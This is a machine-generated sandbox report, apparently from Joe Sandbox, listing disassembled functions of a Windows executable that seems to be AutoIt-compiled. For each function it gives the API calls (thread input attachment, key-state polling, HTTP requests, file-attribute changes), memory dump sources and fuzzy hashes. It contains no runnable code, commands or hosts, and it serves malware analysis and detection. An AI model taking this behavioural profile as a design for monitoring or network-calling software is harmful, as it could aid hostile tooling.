                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6617CB5A00258AFDB21DFA8CD80FEE77F8EB09300F1041A9FA84E7291D774A945DB50
                                                                                                                                                                                                                                                                                                        Function 0101BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0101BB18
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BB2C
                                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0101BB33
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BB42
                                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0101BB54
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BB6D
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BB7F
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BBC4
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BBD9
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BBE4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d216065a8b7b1807195c8db8e9ef2712b646ec57b5ff16b0173ddacd12bfb11
                                                                                                                                                                                                                                                                                                        • Instruction ID: d097a1a956782b001c1e3b08eee7f07d0bf01c29a521bdf22e039821f9132675
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d216065a8b7b1807195c8db8e9ef2712b646ec57b5ff16b0173ddacd12bfb11
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2316BB5908215ABEB329B58D9C8FAA7BF9BB58212F104045FAC5D618CD7FDD8418F20
                                                                                                                                                                                                                                                                                                        Function 00FE2FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3007
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4), ref: 00FE2D4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: GetLastError.KERNEL32(01081DC4,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4,01081DC4), ref: 00FE2D60
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3013
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE301E
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3029
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3034
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE303F
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE304A
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3055
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3060
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE306E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 00b23598cd8629a619813bc9dcd6e7e4732e8339362e41578705787c02c3c5f6
                                                                                                                                                                                                                                                                                                        • Instruction ID: 10498815f18f61685d20199475b645bc6d628e5a4c57aefc5cc4d9888f9aa1fc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00b23598cd8629a619813bc9dcd6e7e4732e8339362e41578705787c02c3c5f6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D311B97650014CBFCB51EF56CC82CDD7B69EF05350B814495FA089F122E635DE61AB50
                                                                                                                                                                                                                                                                                                        Function 00FB2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FB2AF9
                                                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00FB2B98
                                                                                                                                                                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00FB2D7D
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00FF3A1B
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00FF3A80
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FF3AAD
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                        • String ID: close all
                                                                                                                                                                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1f5b55018080c47c8360035260fefcabec29c28a40486d04dc1f73d4f28d7e80
                                                                                                                                                                                                                                                                                                        • Instruction ID: debdb90244d99bb75fea6778bc17318a716398765363ec7b6757c78393f8b37c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f5b55018080c47c8360035260fefcabec29c28a40486d04dc1f73d4f28d7e80
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5D19175B01212DFCB19EF16C895BA9F7A1BF08710F1042ADE54AAB261CB35ED12EF40
                                                                                                                                                                                                                                                                                                        Function 01028835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 010289F2
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028A06
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 01028A30
                                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 01028A4A
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028A5C
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028AA5
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 01028AF5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                        • Opcode ID: 812ae4f914e5bb71bd6b111cd138e424b8d3cde184f7179f39094c8f5523b63e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 877d3d37458c90d85901a1576a08f8339350d6a13e29b071efd8e0c15a6a6185
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 812ae4f914e5bb71bd6b111cd138e424b8d3cde184f7179f39094c8f5523b63e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3281E175A043119BDB60EF58C884AAEB7E8BF84310F08885FF9C5D7251DB38E945CB92
                                                                                                                                                                                                                                                                                                        Function 00FB7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00FB74D7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7567: GetClientRect.USER32(?,?), ref: 00FB758D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7567: GetWindowRect.USER32(?,?), ref: 00FB75CE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7567: ScreenToClient.USER32(?,?), ref: 00FB75F6
                                                                                                                                                                                                                                                                                                        • GetDC.USER32 ref: 00FF6083
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FF6096
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00FF60A4
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00FF60B9
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00FF60C1
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FF6152
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8a17e7617c29ef3a9b792333dd509a35416eea2cc0716f398aad47eb1d1e531a
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd44521db91c1b260faa8c17b4bb2e3dd9358d163822fe58aaf27fc8e3349571
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a17e7617c29ef3a9b792333dd509a35416eea2cc0716f398aad47eb1d1e531a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1871C335904209EFCF25DF64C884AFA7BB5FF49321F244269EE959A266CB358840FF50
                                                                                                                                                                                                                                                                                                        Function 0104955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetCursorPos.USER32(?), ref: 00FB19E1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: ScreenToClient.USER32(00000000,?), ref: 00FB19FE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetAsyncKeyState.USER32(00000001), ref: 00FB1A23
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetAsyncKeyState.USER32(00000002), ref: 00FB1A3D
                                                                                                                                                                                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 010495C7
                                                                                                                                                                                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 010495CD
                                                                                                                                                                                                                                                                                                        • ReleaseCapture.USER32 ref: 010495D3
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0104966E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 01049681
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0104975B
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3c14df9cfcc9c7dc5a6826a27f2f1bdc7b7cab898d8bec757de7db25eca5c429
                                                                                                                                                                                                                                                                                                        • Instruction ID: c4e3176aca430b917d026e1fe86639567e8ac94440c34cc37cc25cf57ec9713d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c14df9cfcc9c7dc5a6826a27f2f1bdc7b7cab898d8bec757de7db25eca5c429
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A95199B4204300AFD714EF24CC96FAA7BE4FB98714F000A6DF9D697292CB799904DB52
                                                                                                                                                                                                                                                                                                        Function 0102CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0102CCB7
                                                                                                                                                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0102CCDF
                                                                                                                                                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0102CD0F
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0102CD67
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 0102CD7B
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0102CD86
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: 556d3e6e91b8c343112cc7a518a606c9f8cb31dbdbea5cd23124562d1875d074
                                                                                                                                                                                                                                                                                                        • Instruction ID: 60e715b8b2639ad752bed6fdca26ce86c656b3d823e421f10270d1f96b8a082b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 556d3e6e91b8c343112cc7a518a606c9f8cb31dbdbea5cd23124562d1875d074
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F31A0B5600618AFE731AFA49A88AAF7FFCEB54640B10455EF4C6D3200DB35E9049B60
                                                                                                                                                                                                                                                                                                        Function 0101A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FF55AE,?,?,Bad directive syntax error,0104DCD0,00000000,00000010,?,?), ref: 0101A236
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,00FF55AE,?), ref: 0101A23D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0101A301
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                        • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                                        • Opcode ID: d8ca48cf6eeb36bad1acfcb9a6ee21934d36ddc0a28da24b49b1cd27032efdea
                                                                                                                                                                                                                                                                                                        • Instruction ID: 501d587b3ee0cd9e8754bbccde986c1cde7f40d5db3334566c9f5d4fa46edbf1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8ca48cf6eeb36bad1acfcb9a6ee21934d36ddc0a28da24b49b1cd27032efdea
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8321823190025EEFCF11AFA4CC4AEEE7B79BF18300F044469F545A6062EB7A9618EF10
                                                                                                                                                                                                                                                                                                        Function 010129EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 010129F8
                                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 01012A0D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 01012A9A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                        • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                                        • Opcode ID: 80000f65191575b8788656d46358ac41f27651567b21d96e5b0bff712c709b58
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9135be57374c3f80a10d02620dc226ff7cd3e288389343418731112e9a8ae037
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80000f65191575b8788656d46358ac41f27651567b21d96e5b0bff712c709b58
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34112977684707BBFA257225EC07DAA37DDDF05724B700016F985E5086FB6F64805618
                                                                                                                                                                                                                                                                                                        Function 00FB7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00FB758D
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FB75CE
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00FB75F6
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00FB773A
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FB775B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
